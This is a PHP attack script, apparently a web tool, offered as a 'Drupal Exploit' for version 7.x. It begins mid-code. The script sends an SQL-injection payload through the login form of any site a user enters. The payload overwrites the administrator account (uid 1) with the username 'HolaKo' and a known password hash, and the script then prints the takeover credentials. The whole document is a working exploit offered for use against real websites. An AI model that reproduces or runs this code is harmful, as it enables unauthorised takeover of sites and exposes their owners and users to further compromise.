Drupal Exploit
Version 7.x
array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '/user/login/', null, $ctx);
echo "Testing user/login
";
if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) {
echo "Success
User : HolaKo
Password : admin
Click here";
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
}
if(isset($_GET['submit'])){
$url = "http://".$_GET['url']."/";
$post_data = "name[0;update users set name %3D 'HolaKo' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
echo 'Testing at Index
';
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success
User : HolaKo
Password : admin
Click here";
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
}
?>
Developed By HolaKo